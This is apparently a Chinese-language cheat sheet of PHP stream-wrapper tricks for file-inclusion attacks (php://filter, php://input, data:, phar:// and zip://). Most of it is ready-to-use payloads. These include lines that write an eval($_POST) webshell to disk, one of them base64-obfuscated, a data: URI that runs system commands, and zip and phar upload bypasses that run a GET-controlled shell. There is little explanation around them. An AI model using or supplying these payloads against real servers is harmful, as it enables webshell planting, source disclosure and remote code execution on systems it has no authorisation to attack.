跳转至

Php伪协议

php://filter

php://filter/read=convert.base64-encode/resource=xx.php

以base64编码将文内内容输出,可以用来查看源码 title

php://input

对POST的参数进行编译 title

<?php file_put_contents("1.php","<?php phpinfo(); ?>"); ?>
<?php file_put_contents('1.php','<?php eval($_POST[lic]); ?>'); ?>

file_put_contents(base64_decode("MS5waHA="),base64_decode("PD9waHAgZXZhbCgkX1BPU1RbbGljXSk7ID8+"))
fputs(fopen(base64_decode("MS5waHA="),"w"),base64_decode("PD9waHAgZXZhbCgkX1BPU1RbbGljXSk7ID8+"))

data:URI

data:text/plain,<?php system('cat /var/www/FileInclude.php')?>
title
data:text/plain;base64,[攻击代码的base64编码]
title


以下适用于上传文件后会被自动改后缀名的情况下

phar://

$ vim shell.php
<?php print_r( scandir('/var/www/')) ?>
$ zip shell.zip shell.php
上传后被自动更名为png 访问 phar://uploads/xxxxxxxxxxxxx.png/pharphar://uploads/xxxxxxxxxxxxx.png/shell.php

title

zip://

$ vim shell.php
<?php $_GET['f']($_GET['s']); ?>
$ zip shell.zip shell.php
上传后被自动更名为png 访问zip://uploads/xxxxxxxxxx.png%23shell&f=system&s=pwd

title